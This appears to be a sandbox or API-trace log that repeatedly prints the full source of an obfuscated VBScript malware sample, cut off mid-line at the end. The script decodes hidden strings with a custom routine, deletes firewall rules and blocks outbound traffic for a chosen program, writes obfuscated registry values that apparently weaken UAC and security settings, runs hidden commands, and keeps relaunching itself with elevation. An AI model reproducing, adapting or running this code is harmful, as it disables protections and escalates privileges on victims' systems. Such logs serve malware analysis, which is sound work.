6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.302] wcsncmp (_String1="le (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.302] wcsncmp (_String1="e (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.302] wcsncmp (_String1=" (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.302] wcsncmp (_String1="(Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, 